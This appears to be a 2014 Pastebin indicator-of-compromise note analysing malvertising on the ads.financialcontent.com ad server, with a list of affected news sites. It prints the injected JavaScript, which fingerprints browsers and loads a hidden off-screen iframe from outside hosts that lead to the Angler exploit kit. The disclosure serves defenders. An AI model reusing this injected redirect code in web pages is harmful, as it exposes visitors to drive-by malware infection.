Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // IOC - ads.financialcontent.com - 2014-12-16
- // Requests for Ads come to 'ads.financialcontent.com/www/delivery/ag.php'. This script generates another page that contains a JS with the following function:
- function phpAds_adSenseLog(a) {
- var b = '__';
- var c;
- if (c = a.src.match(/^(.*)\/afr\.php\?n=([a-z0-9]+)/i)) {
- phpAds_adSenseClick(c[1], 'oaparams=' + b.length + b + 'n=' + c[2])
- } else {
- while (typeof a.parentNode != 'undefined') {
- if (a = a.parentNode) {
- var t = a.innerHTML;
- if (c = t.match(/\/\* openads=([^ ]*) bannerid=([^ ]*) zoneid=([^ ]*) source=([^ ]*) (.*)\*\//)) {
- var d = 'oaparams=' + b.length + b + 'bannerid=' + c[2] + b + 'zoneid=' + c[3] + b + 'source=' + c[4];
- var e = c[5].split(' ');
- for (i = 0; i < e.length; i++) {
- data = e[i].split('=');
- if (data[0] != '' && typeof(data[1]) != 'undefined') {
- d += b + data[0] + '=' + data[1]
- }
- }
- phpAds_adSenseClick(c[1], d);
- break
- }
- }
- }
- }
- }
- // Once executed it'll generate an Ad request URL similar to this - http://ads.financialcontent.com/www/delivery/afr.php?n=fcad328486&&zoneid=4925&cb=fcad328486
- // The page returned will have a 'bonus' JS added right after <body> tag. Example:
- function p() {
- return (typeof ActiveXObject != "undefined" || typeof XMLHttpRequest != "undefained") && !/(Chrome|Firefox|Linux|Mac OS)/.test(navigator.userAgent)
- }
- function b() {
- return a.cookie.indexOf(d)
- }
- var a = document;
- var l = "http: //concentrations.myownincomeathome.com/coach/component/view/quotes.js";
- if (p()) {
- if (b() == -1) {
- var c = a.createElement("iframe");
- c.setAttribute("src", l);
- c.style.position = "absolute";
- c.style.left = "-1478px";
- c.style.top = "-1343px";
- c.style.width = "273px";
- c.style.height = "285px";
- try {
- a.body.appendChild(c);
- a.cookie = d + "=governing; expires=Thu, 18 Dec 14 17:27:50 +0300; path=/"
- } catch (w) {}
- }
- } else {}
- var d = "retains"
- // The script will check the browser type and underlying OS and if it's not 'Chrome' or 'Firefox' or it's not running on 'Linux' or 'Mac OS' it will request yet another JS that contains the following code:
- <iframe src="http://vomito-grondspekulasie.nh-cahps.net/ba8xtu44hs.php" style="position:absolute;left:-1880px;top:-1316px;width:206px;height:267px;"></iframe>
- // When parsed will take the browser to Angler EK landing page.
- // List of referring websites seen requesting Ads with 'bonus' content:
- // http://kutv.com/
- // http://www.microcapdaily.com/whats-next-for-nuvilex-inc-otcmktsnvlx/17687/
- // http://www.tradersmagazine.com/profile/password.reminder.html
- // http://www.talkmarkets.com/content/us-markets/guess-what-happened-the-last-time-the-price-of-oil-crashed-like-this?post=53841&utm_source=outbrain&utm_medium=referral
- // http://www.wdrb.com/
- // http://www.concordmonitor.com/news/work/business/12853256-95/concord-market-basket-employees-encourage-customer-boycott
- // http://newsok.com/business
- // http://www.buffalonews.com/business/homes-in-canadian-border-cities-are-far-more-costly-than-in-the-us-why-20141207
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement